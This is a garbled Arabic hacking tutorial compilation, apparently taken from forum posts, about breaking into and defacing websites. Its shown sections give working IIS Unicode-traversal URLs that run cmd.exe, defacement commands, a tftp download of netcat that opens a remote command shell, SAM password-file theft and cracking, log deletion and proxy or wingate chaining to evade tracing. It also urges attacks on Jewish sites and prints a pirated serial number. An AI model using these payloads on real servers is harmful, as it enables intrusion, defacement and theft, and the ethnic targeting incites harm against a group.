المحتويات المقدمة. .1 الفهرس. .2 مقدمة عامة عن الهاكر. .3 كيفية البحث في النترنت. .4 مفاهيم خاصة بشبكات النترنت )الجزء .5 اللول(. مفاهيم خاصة بشبكات النترنت )الجزء .6 الثاني(. المن عبر النترنت. .7 أمن الشبكات. .8 مصطلحات مهمة للمبتدئين في اختراق .9 المواقع. .10اختراق المواقع للمبتدئين. .11الختراق ببرنامج Webcrack. .12الختراق ببرنامج MungaBunga. .13برنامج تدمير المواقع .WinSmurf .14شرح برنامج Evil Pingلتدمير المواقع. .15برنامج الدرة لتدمير المواقع. .16تدمير المواقع بدلون برامج. .17التلنت. .18معلومات عن .DNS 1
.19معلومات عن Routing in the .Internet .NETBIOS .1 .2برلوتوكول خدمة .Finger Net .3شرح مختصر لادارة الشبكة بإستخدام المر. .4شرح الـsecure shell. .5شرح معنى الـ Buffer Overflows. .6الـ CGIلوعلقتها بالنترنت. .7كيف تحمي نفسك لوتخفي أفعالك؟!. .8كيف تبقى مجهول الهوية في النت )الجزء اللول(؟؟. .9كيف تبقى مجهول الهوية في النت )الجزء الثاني(؟؟. .10برنامج HTTP Portالذي يجعلك تتصفح النت متخفيا!.!ً. .11شرح برنامج NeoTrace. .20كيفية القيام بجمع المعلومات عن موقع ألو شبكة. .21برنامج عمران سكان للبحث عن الثغرات. .22الختراق عن طريق اليونيكواد )الجزء اللول(. .23الختراق عن طريق اليونيكواد )الجزء الثاني(. 2
.24معلومات عامة عن كيفية الستفاادة من ثغرات اليونيكواد. .25الدليل الكامل لختراق سيرفر .IIS .26ادراسة مفصلة لوبعمق في الـ UniCode. .27تدريب على عملية الختراق بواسطة اليونيكواد. .28شرح مفصل لكيفية اختراق المواقع المجانية. .29ادرس مفصل عن الكوكيز. .30شرح برنامج السطورة God Willفي تلغيم الصفحات. .31لواداعً.ا للبرنامج السطورة لومرحبا ببرنامج .NOOP4 .32معلومات مهمة عن المواقع التي تدعم الفرلونت بيج. .33اختراق المواقع التي تدعم الفرلونت بيج. .34الختراق العشوائي. .35الطريقة الصحيحة لوالمثلى في اختراق المواقع. .36نبذه يسيرة لومبسطة عن كيفية اختراق المواقع. >) .37س&جمنقول من منتديات شبكة الحز.م السلمية الكاتب :بلك هنتر منقول الكاتب :عصا.م الوقيت منقول من منتدى إعصارالكاتبالمترهجم>>>>>> ال ) host nameاسم الجهاز( القاره الدوله المدينه المتصفح نظا.م التشغيل ال screen resolution الوان الشاشه مزود الخدمه الخاص بك)>>>>(ISP 47
هناك 3انواع log filesمهمه: - WTMPيسجل كل دتخول\تخروج ،مع ميعاد الدتخول\الخروج بالضافه الى ال hostو tty - UTMPمن Onlneفي هذه اللحظه - LASLOGمن اي هجاء الدتخول\تخروج و الكثير الكثير!! لذا لو الدمن اراد ان يلقي نظره عليهم ) (log.filesسوف يوقع بك)track you ... (down ربما تقول :مفيش مشكله انا هاستخد.م بروكسي! بس ادي حلجه لز.م تعرفها عن البروكسيهات هجهازك ========================= ====================================منقول من موقع نورةمنقول من منتديات ابن مصرالكاتبمنقول من منتديات شبكة الحز.م السلميةالكاتب>.logout 217
امور و اشياء يجب تجنبها و الحظر منها====================== لتقو.م ابدا بكسر اي باسورد ال على encrypted partitionكما عليك دائما انت تحذر من استخدا.م اشتراكاتك ) اشتراك الجامعه على سبيل المثال ( لنه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه adminو من ثم سيعرف مالذي تقو.م به و الملفات التي تستخدمها الخ .. حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب تخصوصا غاويين نسمي اسماء اسامي مخيفه على الفاضي .. لتفكر في نفسك فقط ..يعني حين ان تستخد.م بعض الشتراكات او ال shellsالتي تسمح بالعمل الخلفي backgroundلبد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت النظار !!! حاول ان لتستخد.م parametresعلى قدر المستطاع ...على سبيل المثال اذا اردت ان تتصل من الشيل على تيلنت لموقع معين او سيرفر معين لتقو.م بعمل التي telnet http://www.host.com/ : 23انما ببساطه اتبع الخطوات البطيئه و هي telnet 218
open /http://www.host.com و هكذا .. في حالة انك اتخترقت سيرفر معين من الفضل ان تضع عليه backdoorsمخصصه لنظا.م التشغيل ) مش sub7هههههههههه ( و هي كثييره و موهجوده مجانا على النترنت الجزء الرابع :التقنيات الحديثه الي يتي يجب ملحظتها ============================= == تمهيد******* بعد ان ثبت اول snifferو تخططت لبدا التختراقات .. عليك ان تعرف كيف تستخد.م هذه التقنيات متعبا ما يلي : امنع تقفى اثرك من اي نوع********************** قد يلحظ الدمين ) مدير الشبكه ( وهجودك كمخترق hackerو انك اطحت باحد المواقع لكن هذا ليهم ...المهم هو انه كيف سيرصدك و عندها كيف يمكن 219
ان يتعامل معك !!! لذا ففي هذا الجزء سيتم توضيح كل الحتمالت و الساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف يمكن ان تمنعها ... * من الطبيعي ) العادي ( ان يسهل على مدير الشكبه ) ( adminمعرفة النظا.م الذي كان المخترق عليه عند دتخوله على شبكته و ذلك اما عن طريق ملفات اللوق ) هذا ان كان الهاكر غبي لتركها كما هي ( او من ال outputمن ال sniffer او من اوامر netstatفي حالة ان المخترق مازال موهجودا online من اهجل هذا تختاج ال !! GateWay Server * A gateway server in betweenهذا واحد من الكثيير من السيرفرات التي يوهجد لك حساب عليها و التي تعتبر في منتهى السخافه في الستخدا.م و انت تحتاج لن تكون رووت عليها لتستطيع تغيير ال wtmp and lastlogs كما انه لبد ان من استخدا.م اكثر من gateway serverو ان تبدل بينهم باستمرار حتى ل يتم الكشف عنك .. 220
من الشيل الذي ستخترق منه ..قم بالتصال بال gateway serverو من ثم تتصل بالسيرفر المراد اتختراقه .. ==< ) تحتاج دائما ل root accessلتغيير اللوق ( باستخدامك ل Dialup serverيجنبك الكثيير من المشاكل ..حيث انك في غنى عن التعديل في ملفات اللوق بشرط ان تدتخل باشتراك مختلف في كل مره تدتخل فيها على ال (= hacked system ملحوظه :اذا كنت قادر على التصال بسرفيرات dialupكثييره فل حاهجه لن تستخد.م hacking serverلنه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من تخللها بالنسبه للمتواهجدين في الوليات المتحده المريكيه و اوروبا ) الدول المتقدمه ( حتى و ان قمت بما سبق ) ( dialup serversيمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها ! نتيجه و اتختصار للنقطه السابقه موضحه بالرسم في الصوره التاليه : 221
ايجاد اي نوع من انواع ملفات اللوق lOGsمهماكان فيها من تلعب .. ******************************************** ****** *** من الها.م و الضروري هجدا ان تعثر على كل ملفات اللوق حتى المخفي منها ..للحصول و العثور على هذه الملفات يمكن ذلك بهاتين الطريقتين : - 1اعثر على هجميع الملفات المفتوحه :و يمكنك ذلك باستخدا.م برنامج LSOFهو اتختصار List Open Filesو من ثم يمكن العثور عليهم و التعديل فيهم - 2ابحث عن كل الملفات التي تغيرت ) حدث فيها تغيير ( من بعد دتخولك - بعد دتخولك قم بعمل touch /tmp/checkو بعدها 222
قم ""find / -newer /tmp/check -print العمليه التي سنقو.م بها ستاذخ الشكل التالي :بحث >>>[Proxy]>>>>>[Web [Pages ---------------Proxy Chaining ---------------معناها عدة بروكسيات وهذي طريقة فعالة هجدا لكي تصبح مجهول الهوية حيث يمكنك ان تتصل بأكثر من بروكسي لكي تعرض موقع واحد مثال/ 249
] User]>>>[Proxy1]>>>[Proxy2]>>>[Pr [oxy3]>>>[Proxy4]>>>[Destination يوضح هذا المثال ان المستخد.م اول عليه التصال بالبروكسي الول فالثاني فالثالث والرابع وأتخيرا الهدف مما يسبب بطأ في التصال Destination = web page, Unix server, ftp server, etc إذا Proxy chainingمطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدتخول إلى أي serverمثل telnet, ftp, or http Chainingهي مهمة كما أقول لن تصبح مجهول %100لكن حاول بقدر المستطاع على ان ل تمسك ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثل حاولت تدتخل على موقع بالـ ftpرا ح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من Adminstratorملفات Logsلكي يعرف المصدر والمصدر ايضا را ح يكون proxy ههههههههه يعني على هذا المنوال إلى ان يصل الى المستخد.م لذلك عملية Chaining Proxyعملية مفيدة هجدا ويصعب احدهم المساك بك 250
لكن ملفات Logsتنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسمو ح به من تحميل الملفات على البروكسي الخاد.م الي يحتوي على البروكسيات لذلك سوف تصبح ملفات Logsمتجددة ... ---------------HTTP Chaining --------------- HTTP chainingهي نفس طريقة Proxy ويمكنك عملها من مستعرضك وفي تخانة Address مثال: _http://proxy.magusnet.com/-http://www.google.com حركة هجميلة وهجديدة ) (-_-لم ترونها مسبقا صحيح !!! وأيضا يمكننا استخدا.م Chainingمثل: _http://proxy.server1.com/-_http://proxy.server2.com/-http://www.destination.com 251
او يمكننا وضع عناوين بروكسيات بمنافذها http://anon.free.anonymizer.com/htt p://www.google.com مثال آتخر كإضافة علمة ) (/بين المواقع http://proxy1/http://proxy2:80/proxy 3:80/http://www.yahoo.com = proxyاستبدله ببروكسي رقمي يكون أفضل لك ..... ---------------Browser Chaining ---------------وهو استخدا.م البروكسي من متصفحك وانا سوف يكون حديثي فقط عن Internet Explorerلنه الكثر استخداما ---- ألحين مثل عندنا بروكسي 213.234.124.23:80 252
العنوان213.234.124.23: المنفذ80: ألحين كيف نحطها بدال البروكسي الخاص بالـ ISP أي مزد تخدمة النترنت نرو ح عند أدوات Tools تخيارات إنترنت Internet Options بعدين اتصالت Connections تختار التصال الي تدتخل في النترنت بعدين إعدادات Settings را ح تجد ) Addressالعنوان( ) Portالمنفذ( ونضعه بداله العنوان 213.234.124.23:المنفذ 80:وبعد كذا اضغط موافق و والحين نبغى نستخد.م الستعراض المتعدد Chaining Proixes بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا/ Address: 213.234.124.23:80 253
121.172.148.23:80 143.134.54.67 Port: 80 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&& Wingates &&&&&&&&&&&&&& Wingateهو proxy serverالذي ينزل في هجهازه او هجهازها ليسمح بالفرد او بعدة أفراد ليأتخذون مقاعدهم بالمنفذ تخلل )) 23منفذ Telnetالعادي (( بعض Wingatesيسمحون لي شخص متصل onlineلكي يتصلون به مباشرة او في وقت قصير لتتعدى اليا.م لكن اعلم ان هذا ليس من القانون وهنالك تخصائص للـ Adminتمنع من استخدا.م wingateعلى هجهازه هذا على حسب المدير هل يفهم في هذا المجال أ.م ل !!!! وهي عبارة عن ipأهجهزة أو اسماء أهجهزة تتصل من تخللها على المنفذ 23بأداة Telnetأو يمكنك من عمل بحث ببرامج 254
WinScan Wingate
Download ------------------------------Chaining Wingates Using Telnet ------------------------------ كالسابقWingate م عدة.ألحين را ح نستخد والدوات التي نحتاهجها 255
هي فقط DoSوأداة Telnetلظن أن الهجهزة سوف تخلو من أهم هذين الداتين إل نادرا ..... هجميع wingateتتصل عن طريق المنفذ 23لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا فقط كيف يتم التصال بالـ Telnetعن طريق المنافذ وهذا عنوان هجهاز امكننا إحضاره هو 61.133.119.130ومنفذه 23 ويتم التصال به عن طريق Telnetمثل: C:\WINDOWS>telnet 61.133.119.130 23 لحظ وهجود المسافات فمسافة زائدة او ناقصة قد تعثر تخطوتك بعد كذا سوف تتصل بالوين هجيت مثل هذا Wingate> 203.207.173.166 23 256
بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا Wingate> 213.17.99.45 23 وأيضا اتصل مرة أتخرى Wingate> 10.65.212.7 23 ألحين بعد ماتتصل بأكثر من wingateاتصل بالموقع WinGate>arbornet.org اذا الطريقة وبخطوة سريعة تبدو كذلك C:\Windows> telnet 61.133.119.130 23 Wingate>203.207.173.166 23 Wingate>135.245.18.167 23 257
Wingate>m-net.arbornet.org Connecting to host arbornet.org...Connected ،،،انتهى
258
"بين حماية الخصوصية وإزالة الاثارمن ملفات الـ "Logs >منقول من منتديات الحز.م السلميةالكاتب :حز.م الظاميمنقول من منتدى نجم دوسالكاتب:المدمرمنقولالكاتب< DarK_HaCKeR : برنامج يكشف كل شي عن صاحب اليبي مرحبا شباب .. هاذا برنامج ممتاز للكشف عن معلومات الشخص و بلده و كل شيء بس بمجرد معرفة اليبي ماله ..او تريد تعرف معلومات عن موقع معين .. اسم البرنامج .. Neo Trace Express اتفضلوا الوصلة .. http://www.neoworx.com/dow nload/NTX325.exe
291
292
اتمنى ان الشر ح وافي وهذا هو السيريل نمبر : XDQG-2ZKN-X2PA-KTRQ 293
انتهى،،،
" كيفية القيا م بجمع المعلومات عن موقع أو شبكة " >منقول من منتدى إعصارالكاتب :المدمرمنقول من عالم الكومبيوترالكاتب>P @ LH@CKERZ :
برنامج عمران سكان يعتبر من أفضل برامج كشف الثغرات و ذلك لما يتميز به من سرعه سهولة في .تغيير ملف الثغرات
306
1اسم الموقع المراد البحث عن ثغرات فيه و ل تنسى //:http ملحظه : ل تضع \ في نهايه الموقع مثل /http://www.XXX.com لنه سيضع من عنده /عند تطبيق الثغره 2اسم ملف الثغرات 3لتغيير ملف الثغرات إلى ملف آتخر 4الثغرات الموهجوده في الملف 5لبدء الفحص 6لليقاف 7شاشة العمليات الجاريه من فحص الثغرات على الموقع
307
8الثغرات الموهجوده على الموقع التي نجح اتختبارها 9لمسح شاشه العمليات و النتائج لعاده البحث مره اتخرى على ثغرات اتخرى 10ال 11منفذ ال ملحظ 11 10 : اذا ما عرفت ال فيجب عليك مسح البيانات 12للخروج
ملحظه هامه : ل تنسو المواقع اليهودية التي تنتظر من يخترقها فأرهجو عد.م استخدامه ضد الموقع العربية او السلمية.
308
انتهى،،،
" الوختراق عن طريق اليوبنيكود )الجزء الول( " >منقولالكاتبc:\hEx.txt
316
المر المستخد م لعملية سحب أي :ملف عليك القيا م اول ً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اوخر العنوان :كالتالي http://www.xxxx.com/msadc /hEx.mdb
طريقة تطبيق هذه الثغرات .تطبيق الثغر ة على الموقع من وخلل المتصفح تتم حسب المثلة التالية -: http://www.xxxx.com/scripts /.. %c1%1c../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. 317
%c0%9v../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c0%af../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c0%qf../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c1%8s../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. %c1%9c../winnt/system32/c \:md.exe?/c+dir+c http://www.xxxx.com/scripts /.. 318
%c1%pc../winnt/system32/c \:md.exe?/c+dir +c وقد بنحتاج الى تغيير مسمى الدليل بحيث يكون -: Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
كيفية اوختصار اثغر ة اليوبنيكودحتى تتمكن من تفعيل امر الـ . ECHO في حالة اكتشاف موقع يعابني من مشكلة اليوبنيكود ولنفترض ابنه كان على هذه الثغر ة -: http://www.xxxx.com/msad c/..%c0%af../.. %c0%af../winnt/system32/ \:cmd.exe?/c+dir+c
319
فنحتاج الى بنسخ ملف w3svc.exeالى مجلد inetpub\scriptsوالمر يكون بهذه الطريقة -: http://www.xxxx.com/msad c/..%c0%af../.. %c0%af../winnt/system32/ ?cmd.exe c+copy+c:\winnt\system32 \cmd.exe+c:\inetpub\script s\w3svc.exe بعد بنسخ ملف w3svc.exeالى مجلد ، inetpub\scriptsالن بنقو م بتصفح الموقع من وخلل الثغر ة بهذه الطريقة -: http://www.xxxx.com/scrip \:ts/w3svc.exe?/c+dir+c الن بنستطيع الكتابة داوخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل 320
inetpub\wwwroot\index.ht بحيث يكون المر بالشكلm -: التالي http://www.xxxx.com/scrip ts/w3svc.exe?/c+echo+Hac ked+By+sNiper_hEx+hExRa
[email protected]+>+c:\inetp ub\wwwroot\index.htm
لتاحةCMD طريقة بنسخ ملف الـ. امكابنية الكتابة على الملفات وهو لعطاءCMD الغرض من نسخ ملف الـ امكانية للكتابة داتخل السيرفر في بعض الحالت ويتم -: نسخه الى مجلد السيكربت بهذه الطريقة http://www.xxxx.com/msad c/..%c0%af../.. %c0%af../winnt/system32/ cmd.exe? c+copy+c:\winnt\system32
321
\cmd.exe+c:\inetpub\script s\cmd1.exe الن بامكاننا استخدا.م ملف الـ CMDالجديد في الثغرة بدل من الول بهذا الشكل -: http://www.xxxx.com/msad c/..%c0%af../.. %c0%af../winnt/system32/ \:cmd1.exe?c+dir+c
كيفية معرفة مشكلة الـ Access Deniedوالحلول المتبعة لها . تتم معرفة مشكلة الـ Access Deniedمن تخلل المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Deniedفاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر -: -1الطريقة الولى نسخ ملف الـ CMDالى دليل السيكربت بمسمى CMD1فسوف يتا ح لك امكانية الكتابة باستخدا.م المر Copyباستخدا.م هذا المر -: 322
http://www.xxxx.com/msad c/..%c0%af../.. %c0%af../winnt/system32/ ?cmd.exe c+copy+c:\winnt\system32 \cmd.exe+c:\inetpub\script s\cmd1.exe -2الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي -: oاول انشاء صفحة باسم test.shtml oتكون هذه الصفحة داتخل مجلد wwwroot/hEx/test.shtml oكتابة هذا الكود داتخل الصفحة >!#-- +c:\winnt\mspft.ppl الن مطلوب اضافة مجهول-3 الى نفس الملف الذي قمناAnonymous mspft.pll بانشاءه / shell.exe?/c+echo+anonymo us+>>+c:\winnt\mspft.ppl 325
الن مطلوب ادراج البريد-4 الى نفس
[email protected] mspft.pll الملف الذي قمنا بانشاءه / shell.exe?/c+echo+hEx@Hot mail.Com+>>+c:\winnt\ms pft.ppl م. لزوAnonymous قبلUser إضافة-5 mspft.pll الملف الذي قمنا بانشاءه / shell.exe?/c+echo+user+an onymous+>>+c:\winnt\msp ft.ppl الن تكرار لحاهجة العداد-6 / shell.exe?/c+echo+hEx@Hot mail.Com+>>+c:\winnt\ms pft.ppl
326
يتم هنا ادراج الموقع الحالي
.g للملفات
/ shell.exe?/c+echo+lcd+c:\in etpub\wwwroot+>>+c:\win nt\mspft.ppl -8الن يكتب اوامر الـ FTPاللزمة لسحب الملف من تخاد.م الـ FTPوهي Get index.htmثم يدرج هنا بدون المسج السابق / shell.exe?/c+echo+get+inde x.html+>>+c:\winnt\mspft. ppl -9هنا نفس السابق ولكن باضافة Quit / >>shell.exe?/c+echo+quit+ +c:\winnt\mspft.ppl -10الن يتم تنفيذ امر FTP.exe?+"- ”s:c:winnt\mspft.pplوهو عبارة عن تخطوات قمنا بانشاءها وموهجودة في ملف mspft.pplباحتوائها على مايلي -: 327
Open FTP.host.com Anonymous
[email protected] User Anonymous
[email protected] Get index.html Quit msadc/..%c0%af../../ %c0%af../winnt/system32/ ftp.exe?+""s:c:\winnt\mspft.ppl
طريقة كشف باسورد. الدمينستريتور Microsoft ) نحتاج الى وهجود برنامجين م تنفيذ. ( وهي لزوAccess – L0phtCrack -: بعض الخطوات لتالية وهي باسورد الدمينستيتور للسيرفر يكون موهجود في\ _ في دليل.SAM ملف الـ 328
\winnt\repairوافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack كما هو موضح بالشكل التالي-:
اذا كان هناك مستخدمين في السيرفر ويوهجدلديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLLونستطيع تحديد مسار هذا الملف من تخلل الريجستري بواسطة هذا المفتا ح -: HKEY_LOCAL_MACHINE\SYS TEM\CurrentControlSet\Cont rol\Lsa\SYSTEM32\PASSFIL T.DLL
329
اذا كان السيرفر يعتمد في القراءة باستخدا.مصفحات الـ ASPللوصول الى البيانات من تخلل الـ MySQLفسوف نحتاج الى قاعدة تطبيق ثغرة ) ( htr.+للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي -: http://www.xxxx.com/defa ult.asp+.htr عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.incوقراءة محتوياته للعثور على اسم المستخد.م والباسورد للمسئول عن قاعدة البيانات .
تغيير الصفحة الرئيسية للموقعوعملية الب لوود بواسطة بربنامج . TFTP -1قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htmعلى الـ \:c 330
-2قم بتشغيل برنامج TFTPونفذ المر في الفقرة التالية .
331
c+tftp.exe+"-/ i"+1.1.1.1+GET+index.ht m+C:\inetpub\wwwroot \index.htm وهو البرنامج اللز.م لعمل الب لوود tftp.ex ويجب ان يكون شغال في حالة تنفيذ e المر وهو بمثابة باراميترز لزو.م قراء ""i- البيانات في مكتبة الملفات 1.1.1.1 رقم اليبي الخاص بك وهو المر اللز.م لطلب الملفات مابين GET الرسال والستقبال index. اسم الملف بجهازك htm \ inetpu اسم الدليل في السيرفر b\ww \wroot اسم الملف على السيرفر index. 332
htm
مسح ملفات اللوق حتى ل يتمالتعرف عليك . وتتم هذه العملية من تخلل حذف ملفات الـ Logمن مجلد System32بواسطة المر -: / c+del+c:/winnt/system32/lo gfiles/*.log انتهى ،،،
333
" الوختراق عن طريق اليوبنيكود )الجزء الثابني( " >منقول من منتديات شبكة الحز.م السلميةمنقولالكاتب :بلك هنترمنقول من منتديات شبكة الحز.مالكاتب< DEMON : --------مقدمة - : --------367
يعلم الجميع مدى انتشار سيرفرات IISحيث تشكل النسبة الكبر المستخدمة في تشغيل مواقع النترنت .. ويعلم الجميع مدى ضعف الناحية المنية لهذه السيرفرات ..لذا قررت القيا.م بجمع اشهر ثغرات هذا النوع مع توضيح كيفية عملها . --------ملحظة - : --------معظم الطرق الموهجودة هنا تعمل على سيرفرات IIS4.0و IIS5.0وهجميعها تعتمد على البورت 80 ))يعني من تخلل المتصفح(( . ------------المتطلبات - : ------------ CGI-Scanner -1هجيد ..أنا افضل Whisker )يمكنك تنزيله من هذا الموقع : ( www.wiretrip.net/rfp -2اكتيف بيرل لتشغيل ملفات البيرل ) يمكنك تنزيله من الموقع : ( /http://www.activestate.com 368
-3ويب سيرفر )اي نوع( اباتشي او .. IIS
######################### ######################### #########################
########### # Game Starts !# ###########
---------------- : IIS Hack.exe ---------------اكتشف تخبراء المن في شركة eEyeثغرة امنية تسمح لك بتحميل نسخه ذكية من nc.exeوهجعلها تنصت على المنفذ .. 80 وهذا سيعطيك سطر اوامر cmde.exeمع امتيازات 369
. Administrator بامكانك انزال NC.exeو IIS Hack.exeمن الموقع . /http://www.technotronic.com ويجب تشغيل ويب سيرفر في هجهازك قبل تنفيذ الثغرة .. قم بنسخ اداة nc.exeوضعها في الدليل الرئيسي للويب سيرفر لديك )في اباتشي (Htdocsوفي IIS الدليل . wwwroot ثم قم بتشغيل : IISHack.exe c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe وبعد اتما.م الخطوة السابقة بنجا ح : /c:\>nc http://www.target.comوستجد امامك eGG SheLL ملحظة :تعمل هذه الثغرة على سيرفرات IIS4.0 فقط ))اذا لم يتم تركيب الرقعه(( . do you want me to explain what to do next, hey common you must be kidding 370
....hehe...
-----------------: MDAC = RDS ----------------اعتقد انها ثغرة قديمة قليل )لكني ما زلت ارى ان %40من المواقع تعاني منها .. تسمح لك هذه الثغرة بتشغيل اوامرك على النظا.م الهدف بشكل محلي ..سيتم تشغيل وامرك بصفتك مستخد.م SYSTEMاي بصلحيات مدير النظا.م .. على العمو.م اذا اردت معرفة اذا ما كان النظا.م مصابا بهذه الثغرة ا.م ل .. قم اول بالتصال بالنظا.م الهدف c:\>nc -nw -w : 2 http://www.host.com/ 80ثم قم بارسال المر GET /msadc/msadcs.dll HTTP : فإذا كان الرد application/x_varg :فهذا يعني ان النظا.م مصاب )) اذا لم يتم ترقيعه (( .. بامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع www.wiretrip.net/rfp : (( mdac.pl - msadc2.pl )) v c:\> mdac.pl -h host.com 371
Please type the NT commandline you want to run (cmd /c assumed):\n cmd /c إذا اردت تغيير الصفحه الرئيسية ما عليك ال تنفيذ المر echo hacked by me hehe > : C:\inetpub\wwwroot\index.htm وإذا أردنا احكا.م السيطرة على الموقع بامكاننا تحميل Hacker's Swiss knife Armyاقصد Nc.exeبواسطة هذا المر : systemroot%&&tftp -i YourIP GET% nc.exe&&del ftptmp&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe )) قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءته هجيدا (( بعدها قم بالتصال بالنظا.م الهدف على المنفذ 80 وستجد سطر اوامر مع امتيازات Administrator .
-------------------------------------372
-: Codebrws.asp & Showcode.asp -------------------------------------الملفان عبارة عن قاريء ملفات ASPيأتي مع IIS ولكنه ل يأتي محمل افتراضيا بل يجب على مدير النظا.م تفعيله .. فإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف )) asp.اعني رؤية المصدر(( . باستخدا.م هذا المر ستحصل على ملف السا.م )) اذا كان النظا.م مصابا (( : http://www.victim.com/msadc/sampl _.es...nt/repair/sam بعد الحصول على ملف السا.م & Expand it .. Crack itباستخدا.م الداة المفضلة لدي LC3.0 )سيتم كسرها في اقل من 24ساعه ( .
-------------- : Null.htw -----------عملية شر ح كيفية عمل هذه الثغرة معقد قليل ..لذا سأكتفي فقط بطريقة الستفادة منها .. 373
باتختصار تسمح لك برؤية السورس كود لي ملف .. ASP لتنفيذ الثغرة : ?http://www.victim.com/null.htw CiWe...HiliteType=full سيعرض لك هذا الرابط السورس كود الخاص بالصفحه . Default.asp
---------------------- : webhits.dll & .htw ---------------------اول قم بتجربة اللنك على النظا.م الهدف : http://www.victim.com/blabla.htw فإذا كان الرد بهذه العبارة format of the : QUERY_STRING is invalidفهذا يعني ان النظا.م الهدف مصاب بنسبة . %90 اتخيرا هجرب تنفيذ الثغرة بهذه الطريقة : www.victim.com/xxxxxxxxx/xxxxxxx x/x...hilitetype=full مع تغيير الـ XXXXX/XXXXX/XXXX/XXX.htwباحد هذه 374
الملحقات ,وبالتأكيد سيعمل احدها : iissamples/issamples/oop/qfullhit.ht w iissamples/issamples/oop/qsumrhit. htw isssamples/exair/search/qfullhit.htw isssamples/exair/search/qsumrhit.ht w وبالتالي ستحصل على ملف السا.م قم بكسره بواسطه الداة .. LC3
-----------------------------------------------]ASP Alternate Data Streams [:: -: $DATA -----------------------------------------------هذه الثغرة كانت بدايتها منذ العا.م .. 1998وهي مخصصة بالتحديد لسيرفرات IIS3.0والن تعمل على بعض سيرفرات .. IIS4.0 ومهمتها عرض السورس كود لي صفحه )) البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ (( 375
الهجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل Global.asa يمكن تنفيذ الثغرة من المتصفح بواسطة هذا المر http://www.victim.com/default.asp:: $DATA
------------------ : ASP dot bug -----------------ربما اقد.م ثغرة في هذا النص هي هذه الثغرة حيث تقو.م ايضا بعرض السورس كود الخاص بأي صفحه .. حيث تم اكتشافها في العا.م .. 1997 ويتم تنفيذها من المتصفح بهذا الشكل : http://www.victim.com/sample.asp. لحظ النقطة الموهجودة في اتخر السطر وهي فقط تعمل على سيرفرات . IIS3.0
------------------------------------ : ISM.DLL Buffer Truncation 376
-----------------------------------تخطأ برمجي يسمح للمهاهجم بسحب الملفات ورؤوية السورس كود ايضا .. وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما ..وفي الحقيقة نحن نقو.م بطلب ملف اتخر .. الملف المسؤوول عن هذا الخطأ هو ISM.dllحيث يتم تحميله بعدد كبير من الرموز المسافة )( 20% . Space يمكن تنفيذ الثغرة بهذا الشكل : http://www.victim.com/global.asa %20(...